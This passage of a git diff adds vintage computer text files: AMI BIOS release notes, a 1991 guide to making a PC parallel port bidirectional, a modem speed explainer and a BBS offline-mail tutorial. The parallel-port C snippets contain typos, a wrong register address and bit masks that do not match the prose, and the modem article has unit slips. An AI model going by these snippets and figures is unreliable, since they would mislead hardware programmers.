+82C212B support... + +The AMI BIOS will now support 82C212 and 82C212B chip in the same copy +of the BIOS. The BIOS will automatically find out the type of chip and +program the chipset registers accordingly. The built in EXTENDED CMOS +Setup program will also support both 82C212 and 82C212B. + + + + \ No newline at end of file diff --git a/textfiles.com/computers/bios330.man b/textfiles.com/computers/bios330.man new file mode 100644 index 00000000..5ea7e095 --- /dev/null +++ b/textfiles.com/computers/bios330.man @@ -0,0 +1,140 @@ +AMI 286 and 386 BIOS +new release +release notes + +Ver 03/25/89 +and +Ver 03/30/89 + +New BIOS products from AMI + +* INTEL 386SX BIOS + +Availability: Now + +Options:- + + Standard BIOS + + Standard BIOS+CMOS SETUP program + + Standard BIOS+CMOS SETUP program +Advanced diagnostics program. + +* G2 386 BIOS + +Availability: Now + +Options:- + +Standard BIOS + + Standard BIOS+CMOS SETUP program + + Standard BIOS+CMOS SETUP program+Advanced diagnostics program + + Standard BIOS+CMOS SETUP program+Extended SETUP program for + initializing the G2 386 EEPROM registers. + +* C&T NEAT 386SX BIOS + +Availability: Now + +Options:- + + Standard BIOS + + Standard BIOS+CMOS SETUP program + + Standard BIOS+CMOS SETUP program+Advanced diagnostics program. + + Standard BIOS+CMOS SETUP program+Extended CMOS SETUP program. + + + +New CMOS SETUP program + +The new CMOS SETUP program in AMI BIOS is available now in all the 286 +and 386 BIOS products from AMI. The release 03/30/89 has the new CMOS +SETUP program. + +Features: + +* Full screen based SETUP option editing + +* User defined drive types for drive C and drive D. + + This will help the user to defined his own drive type which will be + stored in the CMOS as drive type 47. You will not have to put + customized drive types in the BIOS through the AMIGEN program or + get BIOS chips from AMI for any hard drive types not present in the + BIOS. + +* Bypassing Keyboard error + + To configure the system for non dedicated file servers, you can set + the keyboard "Not installed" in the SETUP menu so that BIOS will not + report any "Keyboard error" and will not wait for "F1" key to be + pressed during system boot. + +* Bypassing Video error + + To configure the system for non dedicated file servers, you can set + video "Not installed" in the SETUP menu if you do not have a display + connected. The BIOS will not report any "Video error" and will not + wait for any "F1" key to be pressed during system boot. + +* Bypassing floppy error + + To configure the system without floppy controller, you can set both + the BIOS supported floppy drives (A and B) as "Not installed". In that + case BIOS will not check for the floppy controller and will not report + any error. + +Note: New CMOS SETUP program has a totally different format than the +CMOS SETUP program in the earlier AMI BIOS products. If you do not +want the new setup program because of any reason, the old format of +CMOS SETUP program will still be available to you along with the AMI +BIOS Version # 03/25/89. The old CMOS SETUP program will not have the +above mentioned features. + + + + +General corrections + +Allowing 0 W/S operation with 1 bank of memory on a NEAT and C&T 386 +board. + +It is possible to run a NEAT or C&T 386 motherboard at 0 W/S with only 1 +bank of memory installed, by using faster memory chips. Previous releases +of AMI BIOS was forcing the system to 1 W/S if 1 bank of memory is +found on the board. This release of AMI BIOS will not force the system to +1 W/S if only 1 bank of memory is found and Extended CMOS indicates 0 +W/S. However if Extended CMOS options are not set, the BIOS will still use +the default wait state 1. + +Problem with AMIGEN program and AMI BIOS + +AMIGEN program gives user the option to configure a NEAT or C&T 386 +board for clock switching and LED display through keyboard controller. +However, due to a bug in the corresponding BIOS routine, when this option +is used the BIOS displays garbage on the screen at reset. This problem is +fixed in this release of the BIOS. There is no change in AMIGEN program +for this problem. + +Changes in Advanced diagnostics program + +Following changes have been made in the Advanced diagnostics program +available as an option in the AMI BIOS. + +Support for 1.44 floppy drives + +The Floppy diagnostics functions in AMI BIOS will now support 1.44 floppy +drives. + +User defined hard drives + +The user defined drive type of Hard disk diagnostics routines will now +support user defined drive type for both drive C and drive D. + + \ No newline at end of file diff --git a/textfiles.com/computers/biprint.txt b/textfiles.com/computers/biprint.txt new file mode 100644 index 00000000..30b40853 --- /dev/null +++ b/textfiles.com/computers/biprint.txt @@ -0,0 +1,263 @@ +From: markb@tplrd.tpl.oz.au (Mark Bower) +Newsgroups: comp.sys.ibm.pc.hardware +Subject: Bi-directional I/O on printer port - Hardware mods +Summary: make you old PC printer port bi-directional +Keywords: printer port, bi-direcional +Message-ID: <1991Jul10.034144.11106@tplrd.tpl.oz.au> +Date: 10 Jul 91 03:41:44 GMT +Sender: markb@tplrd.tpl.oz.au (Mark Bower) +Organization: Telectronics Pacing Systems +Lines: 250 + + + + MAKING YOUR PC PARALLEL PORT BI-DIRECTIONAL + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + By Mark F. Bower + + +I have had a large number of requests for this information so here it is. + +Disclaimer: Doing this modification may void your warranty on your computer +components, and I take no responsibility for any damage that may be caused +by making this modification. + +Introduction: +~~~~~~~~~~~~~ + +This simple modification allows a standard IBM PC type parallel port to be +used as a bi-directional 8 - 12 bit I/O port for use in applications +such as control, sensing, monitoring, and high speed data trasfer. + +WARNING: Do NOT attempt to read data in from the parallel port using a (non +modified) a standard printer port card. The LS373/374 octal buffer can sink +current and may overheat if this is done. + +The 4 handshake lines are also open collector outputs. + +Requirements: +~~~~~~~~~~~~~ + +o 1 piece of insulated copper wire (1 - 2 inches long). + +o Soldering Iron. + +o Solder, maybe some de-soldering wick. + +o A sharp tool for cutting PCB tracks. + +o A TTL data book is handy. + +o A parallel printer port schematic helps. + +o A digital multimeter for testing. + +o An IBM type parallel printer card - either an original single card or multi- + function card. It may be possible to modify other types of parallel + ports since most are of similar design (in PC's). However, special + cards that use a single VLSI controller chip to perform the functions + of the entire multi-function card may not be modified (of course!). + +Note: Laptop computers generally have a bi-directional parallel printer +port - note however that these bi-directional port use open-collector +outputs on the parallel data bus which may require pull-up resistors +if they are to be connected to a 'standard' modified port for data +trasfer. + + +Method: Hardware mods +~~~~~~~~~~~~~~~~~~~~~ + +The following step are meant as a guide to performing the modification. + +When handling circuit cards, be aware that static electicity and carelessness +can easily cause damage - be extra careful and patient when working on them! + +NOTE: The LS abbreviation may be F, L, or HC in you printer card. + +1. Remove the parallel printer card/multi I/O card from the PC. + +2. Locate the IC named 74LS374 (on standard PC printer port cards) or + 74LS373 (multi I/O cards). If there is more than one of these IC's, + select the one which connects to pins 9 to 2 of the 25 pin printer + port connector. On the IBM PC printer schematic this is U4. + This IC is an octal buffer. + +3. Pin 1 of this IC (the output enable pin) should be currently tied to + ground (on the underside of the board). Cut the track at pin 1 so that it + is now NOT connected to ground. (alternatively it my be possible to cut + pin 1 and bend it up - this is not recommended however). + + This pin was originally connected to gound. In this configuration, the + LS373/374 was hard wired to OUTPUT mode. + +4. Now locate the IC named 74LS174. This IC (a hex latch) is connected to + pins 1,15,14, and 16 of the 25 pin printer connector through either + a 74LS05 (IBM PC printer card) or a 74LS06 (multi I/O card) invertor. + + NOTE: Both the LS373 and LS174 IC's are also connected to the Address/ + Data bus on the card through a LS243 IC. + +5. This IC (LS174) is a hex latch. In the IBM printer port design, only + 5 of the 6 available latches are used. The state of the sixth latch + can be controlled in software, and by attaching its output to pin + 1 of LS373, we can control the direction of data by toggling a single + bit. + +6. To determine which D flip flop is not used, trace the outputs from the LS174 + (use a TTL/LS data book for a pinout of the chip) and see which + one does not connect to the 74LS05 or 74LS06. On the standard PC + printer adapter, pin 15 of the LS174 was not connected (the input from + the data bus should already be connected (on pin 14 in this case). If + it is not, then another wire jumper connected may be necessary). + +7. Now solder a piece of insulated wire from pin 1 of the LS374/373 to + the output of the unused D flip flop (e.g. pin 15 in this case). + + The printer port should now be configurable to be readable and writeable. + +(Notes: This only works because the original printer port could read the data +back that it just printed. When data was sent to the printer, it passed +through LS373 and onto the connector pins and was also stored in the +LS244 latch - this data was then re-read by the printer software to ensure +that the data that appeared on the pins was correct. Unfortunately, you +could not read data that came in from the printer port connector because +the octal buffer was hard wired for output. Using this modification, the +octal buffer can be read (rather than written) and the data that is latched +from this printer port connector can be read by the system). + + +Compatibility +~~~~~~~~~~~~~ + +When the computer is powered on as normal, the BIOS should initialise the +printer port to be in output mode (0 in the direction register). Therefore, +all software should work as normal - printing operations will work +as before. + +If custom software alters the direction register, then some software +may have problems printing (a printer not ready signal or paper out error +may be generated). This can be resolved by either clearing the data direction +register (use debug for example) or by resetting the computer. + +Software Interface: +~~~~~~~~~~~~~~~~~~~ + +To use this 8 bit I/O port for data trasfer the following software can be +used. + +This assumes that the parallel printer port is located at 378 hex. If +this os not the case, subtract the suitable value (e.g. 100h for a printer +as 278 hex) from the register addresses. + +1. Setting the port for output mode (normal printer output): + + Clear bit 6 of the data direction register (formerly unused) + at 37A (hex). + + e.g. i = inportb(0x37A); + outporb(0x371, i & 0xDF); /* output mode */ + + or outporb(0x37A, 0); + + +2. Setting the port for input mode: + + Set bit six of the data direction register at 37A (hex). + + e.g. i = inportb(0x37A); + outportb(0x37A, i | 0x20; + + or outportb(0x37A, 0x20); + + +3. Sending 8 bit bytes to the port (output): + + Send the data to 378 (hex) + + e.g. outportb(0x378, 0xAE); /* send 0xAE over port */ + + +4. Reading 8 bit bytes from the port (input): + + Read data from 378 (hex) + + e.g. x = inportb(0x378); /* read data from port */ + + +5. Hardware handshaking - essential for any communications: + +For successfull communiucations, some sort of hardware handshaking is +required, This requires a couple of extra lines in you connection cable. +For example, the ACK and STROBE lines can be used to signal data ready +between two systems. + +An example is an A-D convertor on the port. To sample a value, send +a pulse on the strobe line (or any oth spare line), wait for an +interrupt (acknowledge/sample taken) from the A-D and then read it +from the port. + + e.g. to send pin 14 of the connector high (and set input mode at + the same time): + + outportb(0x37A,0x28); + + e.g. wait until pin 14 of connector is low : + + while (inportb(0x37A) & 0x08) == 0) + ; + +Pinouts: +~~~~~~~~ + Name Pin + + -Strobe 1 < + +Data 0 2 <> \ + +Data 1 3 <> | + +Data 2 4 <> | + +Data 3 5 <> |- now bidirectional + +Data 4 6 <> | + +Data 5 7 <> | + +Data 6 8 <> | + +Data 7 9 <> / + -Acknowledge 10 > + +Busy 12 > + +Paper out 13 > + +Select 14 > + -Auto Feed 15 < + -Error 16 > + -Initialize 17 < + -Select input 18 - 25 + Ground 2 + +- = active low, + = active high. > from printer/other computer + < from printer adapter + + +Comments: +~~~~~~~~~ + +People who wish to attempt to use this modification to construct +a parallel port SCSI interface should have a look at the Tiny Tiger +SCSI hard drive interface which is used on the Commodore Amiga 500 and 1000 +computers to provide a SCSI hard-drive interface. I am in no +way connected with the manufacturers of Tiny Tiger. + +Any followups, extensions, or developments : email me any time. + +Please email me if you have success with this modification - I've done it +and it works. + +Cheers, + +Mark | /\ +------------------------------------------------------------|/ \ /----------- +Mark F. Bower. (markb@tplrd.tpl.oz.au) || \/ +Design Engineer, || "Synchronize watches! - 11.45!" +Telectronics Pacing Systems R & D. || "2.33!" +7 Sirius Rd, Lane Cove 2066, || "7.54!" +Australia | Phone (Voice) 413 6913|| "Perfect, lets go!" - Maxwell Smart +------------------------------------------------------------------------------- + + diff --git a/textfiles.com/computers/bitsbaud.txt b/textfiles.com/computers/bitsbaud.txt new file mode 100644 index 00000000..50c27734 --- /dev/null +++ b/textfiles.com/computers/bitsbaud.txt @@ -0,0 +1,215 @@ + +Here's an excerpt from The Modem Reference, written by Michael A. +Banks and recommended by Jerry Pournelle in Byte, The Smithsonian +Magazine, et al. +The right to reproduce this article is granted on the condition +that all text, including this notice and the notice at the end of +the article, remain unchanged, and that no text is added to the +body of the article. +Thanks! --MB + + BITS, BAUD RATE, AND BPS + Taking the Mystery Out of Modem Speeds + by Michael A. Banks + + (Copyright, 1988, Michael A. Banks. All rights reserved.) + + Modem transmission speed is the source of a lot of +confusion, even among otherwise informed computer and modem +users. The root of the problem is the fact that the terms "baud" +and "bits per second" are used interchangeably and +indiscriminately. I strongly suspect this is a result of the +fact that it's easier to say "baud" than "bits per second," +though misinformation has a hand in it, too. + If you've ever found yourself confused by the relationship +between bits and baud rate, or if you think that a modem's baud +rate is the same as the number of bits or characters it transmits +per second, please read this article carefully; I guarantee to +clear up the confusion and disabuse you of any false concepts ... + + Bits per second (bps) + Bits per second is a measure of the number of data bits +(digital 0's and 1's) transmitted each second in a communications +channel. This is sometimes referred to as "bit rate." + Individual characters (letters, numbers, etc.), also +referred to as bytes, are composed of several bits. + While a modem's bit rate is tied to its baud rate, the two +are not the same, as explained below. + + Baud rate + Baud rate is a measure of the number of times per second a +signal in a communications channel varies, or makes a transition +between states (states being frequencies, voltage levels, or +phase angles). One baud is one such change. Thus, a 300-baud +modem's signal changes state 300 times each second, while a 600- +baud modem's signal changes state 600 times per second. This +does not necessarily mean that a 300-baud and a 600-baud modem +transmit 300 and 600 bits per second, as you'll learn in a few +lines. + + Determining bits per second + Depending on the modulation technique used, a modem can +transmit one bit--or more or less than one bit--with each baud, +or change in state. Or, to put it another way, one change of +state can transmit one bit--or more or less than one bit. + As I mentioned earlier, the number of bits a modem transmits +per second is directly related to the number of bauds that occur +each second, but the numbers are not necessarily the same. + To illustrate this, first consider a modem with a baud rate +of 300, using a transmission technique called FSK (Frequency +Shift Keying, in which four different frequencies are turned on +and off to represent digital 0 and 1 signals from both modems). +When FSK is used, each baud (which is, a gain, a change in state) +transmits one bit; only one change in state is required to send a +bit. Thus, the modem's bps rate is also 300: + + 300 bauds per second X 1 bit per baud = 300 bps + + Similarly, if a modem operating at 1200 baud were to use one +change in state to send each bit, that modem's bps rate would be +1200. (There are no 1200 baud modems, by the way; remember that. +This is only a demonstrative and hypothetical example.) + Now, consider a hypothetical 300-baud modem using a +modulation technique that requires two changes in state to send +one bit, which can also be viewed as 1/2 bit per baud. Such a +modem's bps rate would be 150 bps: + + 300 bauds per second X 1/2 baud per bit = 150 bps + + To look at it another way, bits per second can also be +obtained by dividing the modem's baud rate by the number of +changes in state, or bauds, required to send one bit: + + 300 baud + --------------- = 150 bps + 2 bauds per bit + + Now let's move away from the hypothetical and into reality, +as it exists in the world of modulation. + First, lest you be misled into thinking that "any 1200 baud +modem" should be able to operate at 2400 bps with a two-bits-per- +baud modulation technique, remember that I said there are no 1200 +baud modems. Medium- and high-speed modems use baud rates that +are lower than their bps rates. Along with this, however, they +use multiple-state modulation to send more than one bit per baud. + For example, 1200 bps modems that conform to the Bell 212A +standard (which includes most 1200 bps modems used in the U.S.) +operate at 300 baud and use a modulation technique called phase +modulation that transmits four bits per baud. Such modems are +capable of 1200 bps operation, but not 2400 bps because they are +not 1200 baud modems; they use a baud rate of 300. So: + + 300 baud X 4 bits per baud = 1200 bps + + or + + 300 baud + ------------------ = 1200 bps + 1/4 baud per bit + + Similarly, 2400 bps modems that conform to the CCITT V.22 +recommendation (virtually all of them) actually use a baud rate +of 600 when they operate at 2400 bps. However, they also use a +modulation technique that transmits four bits per baud: + + 600 baud X 4 bits per baud = 2400 bps + + or + + 600 baud + ------------------ = 2400 bps + 1/4 baud per bit + + Thus, a 1200-bps modem is not a 1200-baud modem, nor is a +2400-bps modem a 2400-baud modem. + Now let's take a look at 9600-bps modems. Most of these +operate at 2400 baud, but (again) use a modulation technique that +yields four bits per baud. Thus: + + 2400 baud X 4 bits per baud = 9600 bps + + or + + 2400 baud + ------------------ = 9600 bps + 1/4 baud per bit + + Characters per second (cps) + Characters per second is the number of characters (letters, +numbers, spaces, and symbols) transmitted over a communications +channel in one second. Cps is often the bottom line in rating +data transmission speed, and a more convenient way of thinking +about data transfer than baud- or bit-rate. + Determining the number of characters transmitted per second +is easy: simply divide the bps rate by the number of bits per +character. You must of course take into account the fact that +more than just the bits that make up the binary digit +representing a character are transmitted when a character is sent +from one system to another. In fact, up to 10 bits may be +transmitted for each character during ASCII transfer, whether 7 +or 8 data bits are used. This is because what are called start- +and stop-bits are added to characters by a sending system to +enable the receiving system to determine which groups of bits +make up a character. In addition, a system usually adds a parity +bit during 7-bit ASCII transmission. (The computer's serial port +handles the addition of the extra bits, and all extra bits are +stripped out at the receiving end.) + So, in asynchronous data communication, the number of bits +per character is usually 10 (either 7 data bits, plus a parity +bit, plus a start bit and a stop bit, or 8 data bits plus a start +bit and a stop bit). Thus: + + 300 bps + ----------------------- = 30 characters per second + 10 bits per character + + 1200 bps + ----------------------- = 120 characters per second + 10 bits per character + + 2400 bps + ----------------------- = 240 characters per second + 10 bits per character + + Common speeds + The most commonly-used communications rates for dial-up +systems (BBSs and online services like CompuServe, DELPHI, and +GEnie) are 300, 1200, and 2400 bps. A few older systems-- +especially Telex systems--communicate at 110 bps, but these are +gradually going the way of the dinosaur. 4800 and 9600 bps +modems are generally available, but few online services or BBSs +accommodate them. This will be changing in the near future, +however, with the cost of high-speed modem technology decreasing +as the demand for it increases. + Modems with even higher bps rates are manufactured (19,200 +and up) but these are not used with dial-up systems; the upper +limit on asynchronous data transmission via voice-grade telephone +lines appears to be 9600 bps. The use of higher transmission +rates requires special dedicated lines that are "conditioned" +(i.e., shielded from outside interference) as well as expensive +modulation and transmission equipment. + # + If you found this article useful, you may want to pick up a +copy of the book from which it was excerpted: + THE MODEM REFERENCE + by Michael A. Banks + Published by Brady Books/Simon & Schuster + ISBN # 0-13-586646-4 $19.95 + + In addition to explaining the technical aspects of modem +operation, communications software, data links, and other +elements of computer communications, the book provides detailed, +illustrated "tours" of major online services such as UNISON, +CompuServe, DELPHI, BIX, Dow Jones News/Retrieval, MCI Mail, and +others. It also contains information on using packet switching +networks and BBSs, as well as dial-up numbers for various +networks and BBSs. + You'll also find hands-on guides to buying, setting up, +using, and troubleshooting computer communications hardware and +software. (And the book "supports" all major microcomputer +brands.) + For more information, contact: + Michael A. Banks + P.O. Box 312 + Milford, OH 45150 + \ No newline at end of file diff --git a/textfiles.com/computers/blt6 b/textfiles.com/computers/blt6 new file mode 100644 index 00000000..e9b0b371 --- /dev/null +++ b/textfiles.com/computers/blt6 @@ -0,0 +1,591 @@ + + Techniques for Off-Line Mail Reading +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + Prepared by + + Robert Dionne + Feeding Hills, MA 01030-1601 + + Revised May 6, 1990 + + Presented by The Data Express Information System to help + newusers become aware of options available for Mail handling + + DOWNLOADABLE AS BLT6.ZIP +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + +The tips and techniques described herein are primarily for use +with IBM PC's and clones and other MS-DOS computers connecting to +a host BBS that uses PC Board 14.2/D and higher with ProDoor 3.1. +If you are using a different kind of computer, you may be limited +to using the tips and techniques for plain ASCII text. If there +are mail doors available, they, along with the applicable +off-line mail reading programs, should be used as the preferred +method of off-line mail reading. If you choose not to use a mail +door, then the techniques presented will allow you to read and +reply to more mail in addition to reducing the on-line time spent +reading mail. + +The purpose of this tutorial is not to teach you how to use the +various programs mentioned through out the tutorial. Rather, the +purpose is to show you how the various programs can be used to +read and reply to mail off-line. + +Therefore, it is assumed that you are familiar with the following: + + 1. ASCII Text Editors + i.e. QEdit, PEdit, Brief, John Hancock Editor, SLED, TED, + or perhaps even the one that may be included with your + communication software. + (It is best if your text editor can handle two open files + at the same time.) + + or + + 2. Word Processor that can read/write ASCII files or that + can convert from/to ASCII format. + (It is best if your word processor can read/write ASCII + files without a conversion process and if it can handle + two open files at the same time.) + + 3. File compression utilities such as PKWARE's PKZIP and + PKUNZIP. + + 4. Your communication software's session capture or session + logging feature. + + 5. Downloading a file using ASCII protocol or the protocol + you selected for use on this BBS. + + 6. Uploading a file using ASCII protocol. + +If you need help with any of the above, please refer to the +appropriate documentation. Your Sysops can advise you on the +text editors and file compression utilities available on this BBS +and they can advise you on transfer protocols. + + +In addition, the off-line mail reading program EZ-Reader can be +used to read and reply to mail received from PC Board 14.2/D mail +capture feature or ProDoor 3.1 ZIPM feature. The utility +programs found in EZUTL10x.ZIP (EZUTL103.ZIP is the latest +release as of this writing) will convert PC Board capture files +and ProDoor ZIPM mail packets into a QMail/MarkMail (*.QWK) +format file readable only by EZ-Reader. + +If you have never used an off-line mail reading program such as +EZ-Reader, I urge you to obtain a copy. Using an off-line mail +reading program is the most efficient method of all the +techniques presented in this tutorial. + +Unfortunately, other off-line mail reading programs, i.e. QMail +2.01 & 2.02, DeLuxe, cannot be used to read the *.QWK format files +created by EZUTL10x.ZIP. These other fine off-line mail reading +programs can be used to read the *.QWK mail packets created by +the QMail and MarkMail mail doors. + +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + +Method #1 +ÄÄÄÄÄÄÄÄ- + +Using your communication program's session capture feature + + +Programs needed: + +Your communication program. + +A text editor + or +word processor that reads/writes ASCII or converts from/to ASCII +format files. + + Your text editor or word processor should be able to have + two files or documents open at the same time and be able + to copy and paste text between the two files. + + +Overview: + +Most communication software will allow you to capture or log all +incoming characters to a text file. This file is a simple text +or ASCII file that can be read in several ways. The technique +described here involves using your communication software's +capture feature to capture all messages non-stop, log off the +BBS, read the capture file (messages) off-line, and prepare +individual replies to be uploaded on your next call. This method +works with PC Board. You should refer to your communication +software manual if you need more information about starting and +stopping a capture file. Please refer to your text editor or +word processor manual for information about converting ASCII +files and working with more than one document at the same time. + + +On-line Procedure: + +Call the BBS and log on as usual. When the Main Board prompt +appears, open or start your capture file. + +At the Main Board Command? prompt, type R;A;NS or R A NS or + R;S;NS or R S NS + +R;A;NS and R A NS = R)ead mail in A)ll conferences based on +selection, NS) display text in non-stop mode. + +R;S;NS and R S NS = R)ead mail S)elect messages in current +conference above the last one you have read, NS) display text in +non-stop mode. + +(Refer to PC Board on-line help for a complete explanation of the +commands and options or ask your Sysops for assistance.) + +The messages from the main board message base will scroll +non-stop on your screen and be captured to your capture file. + +When the main board messages have stopped you may join other +conferences and read the messages there using the above commands. + +After you have finished capturing all the messages, close or stop +your capture file. You may now enjoy other features offered on +the BBS or simply log off. You will read these messages later, +after you have logged off. + + +Off-line Procedure: + +Use your text editor or word processor to read the capture file. +Some word processors cannot read a text or ASCII file directly. +A conversion process may be required to translate a text or ASCII +file into a format the word processor can read. Refer to your +word processor manual for information about ASCII file +conversion. + +When you want to reply to a message jot down on paper the +conference number, if applicable, the message number, recipient's +name, subject, and receiver only, if applicable. Then open a +second file or document giving it a unique file name. Jot down +this file name with the other data. Now use the text editor or +word processor to copy and paste quotation text from the capture +file to the reply file and type your reply. Do not exceed the +maximum line limit for messages as established by the BBS. After +the reply is completed close or save the reply file. + +When you want to reply to another message repeat the above +procedure except when you open the second file use a +different filename. + +If you want to enter a new message use the above procedure and +again use a different filename for the second file. + +If you are using a word processor that does not read or write +ASCII files directly you will be required to convert each of the +reply files from your word processor's format to ASCII format. +Refer to your word processor manual for information about ASCII +file conversion. + +What you wind up with are several reply files in ASCII format +that you will upload instead of typing your messages on-line on +your next call to the BBS. + + +Next On-line Procedure: + +Call the BBS and log on as usual. You may use PC Board or open +the ProDoor door. + +At the PC Board main board prompt join the appropriate conference +and REPLY to a message number, i.e. REPLY 135 , or E)nter a +message (Refer to those paper notes for the message number, name, +subject, etc.) and follow the prompts. If you use ProDoor, do +not use ProDoor's visual editor. When you are prompted to enter +the first line of your message do not type anything. At this +point you initiate an upload of the appropriate reply file using +the ASCII protocol. Sit back and watch the message being typed +for you. If you're using ProDoor and forget to turn off the +visual editor, the screen will fill with garbage text such as +[6f2[8a4[5h7. Don't panic! Let the upload continue! When the +upload is completed save the message in the usual manner. + +Repeat this procedure for each of the remaining replys or +messages. Just make sure you are in the correct conference +before you initiate the next reply or message. + +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + +Method #2 +ÄÄÄÄÄÄÄÄÄ + +Using PC Board Capture File + + +Programs needed: + +Your communication program. + +A text editor + or +word processor that reads/writes ASCII or converts from/to ASCII +format files. + + Your text editor or word processor should be able to have + two files or documents open at the same time and be able + to copy and paste text between the two files. + + +Overview: + +This method is identical to Method #1 except you will not use +your communication software's session capture feature. You will +use PC Board's mail capture feature instead. Replies can be +uploaded to PC Board or to ProDoor. + + +On-line Procedure: + +Call the BBS and log on as usual. + +At the Main Board Command? prompt type R;A;D or R A D or + R;S;D or R S D + +R;A;D and R A D = R)ead messages in A)ll conferences based on +selection D) automatically capture and download read request. + +R;S;D and R S D = R)ead messages S)elect messages in current +conference above the last one you have read D) automatically +capture and download read request. + +PC Board will scan the conference message base for all messages. +These messages will be placed into an ASCII or text file that you +will download using the protocol you selected for use on the BBS. +These ASCII files are free downloads. + +(Refer to PC Board on-line help for a complete explanation of the +commands and options or ask your Sysops for assistance.) + + +Off-line Procedure: + +Follow the procedures presented in Method #1 to read and reply to +these ASCII files. + + +Next On-line Procedure: + +Follow the procedures presented in Method #1 to upload your +replies and messages. You may use PC Board or ProDoor. + +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + +Method #3 +ÄÄÄÄÄÄÄÄ- + +Using ProDoor ZIPM Mail Capture + + +Programs needed: + +Your communication program. + +PKWARE's PKUNZIP file decompression software + +A text editor + or +word processor that reads/writes ASCII or converts from/to ASCII +format files. + + Your text editor or word processor should be able to have + two files or documents open at the same time and be able + to copy and paste text between the two files. + + +Overview: + +This method is identical to Method #1 except you will not use +your communication software's session capture feature. You will +use ProDoor's ZIPM mail capture feature instead. ProDoor's ZIPM +will Zip new mail. ZIPM should capture up to 200 new messages in +selected conferences and then archives them into one file using a +file compression program, usually PKWARE's PKZIP, for smallest +possible download time. The compressed file is an ASCII or text +file. You download the file and decompress it. Replies can be +uploaded to PC Board or to ProDoor. + + +On-line Procedure: + +Call the BBS, log on as usual and open the ProDoor door. + +At the ProDoor [Main Board] Command? prompt type ZIPM + where are the conferences you specify. +Example: ZIPM 0 1 4 . + +Other Examples: + ZIPM N ;list new messages by conference before capture + ZIPM A ;archive mail in all conferences + ZIPM M 10 14 ;archive mail in main board (M), areas 10 and 14 + ZIPM TOOLS AI ;archive TOOLS and AI conferences + Use (L)ast-read command to reset your "last read" message + pointers. + Use (J A)uto-config to select message areas in (ZIPM A)ll. + +(Refer to ProDoor's (?) help messages for a complete explanation +of the command details or ask your Sysops for assistance.) + +ZIPM will scan the specified conferences for all messages since +you last logged on and compress them into one file. You will +download this file using the protocol you selected for use on the +BBS. Do not use ASCII protocol. This file will be a free +download. + + +Off-line Procedure: + +Decompress this file using the applicable decompression program, +usually PKWARE's PKUNZIP. Refer to PKWARE's manual for +information about using PKUNZIP. The decompressed file will be +an ASCII or text file. + +Follow the procedures presented in Method #1 to read and reply to +this ASCII file. + + +Next On-line Procedure: + +Follow the procedures presented in Method #1 to upload your +replies and messages. You may use PC Board or ProDoor. + +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + +Method #4 +ÄÄÄÄÄÄÄÄ- + +Use EZ-Reader Utilities (EZUTL103.ZIP) to convert PC Board +Capture File (from Method #2) or ProDoor ZIPM Mail File +(from Method #3) to QMail/MarkMail file format *.QWK. + + +Programs needed: + +Your communication program. + +PKWARE's PKZIP & PKUNZIP file compression software + +EZ-Reader Utilities EZUTL103.ZIP + +EZ-Reader off-line message management software (EZ124B.ZIP or +higher recommended) + +A text editor to be used with EZ-Reader + + Your text editor should be able to have two files or + documents open at the same time and be able to copy and + paste text between the two files. + + + +Assumption: + +Method #4 assumes that you have used EZ-Reader off-line message +management software. This tutorial will not teach you how to use +the EZ-Reader program. + + +Overview: + +The utility programs contained in EZ-Reader Utilities EZUTL103.ZIP + +PCB2QWK.EXE +REP2PCB.EXE +ZIPM2QWK.EXE +REP2ZIPM.EXE + +will convert PC Board capture files (from Method #2) +and ProDoor ZIPM mail packets (from Method #3) into +QMail/MarkMail format files *.QWK that can only be read using +EZ-Reader. Replies and messages created by EZ-Reader will be +converted from QMail/MarkMail format files *.REP to ASCII files +that will be uploaded to PC Board or ProDoor. Uploads to PC +Board require special scripts for your communication software. A +sample Qmodem script is included in EZUTL103.ZIP. Uploads to +ProDoor do not require a special script. They are uploaded at +the [Main Board] Command? prompt using ASCII protocol. +If ProDoor is available use it instead of PC Board. + + +On-line 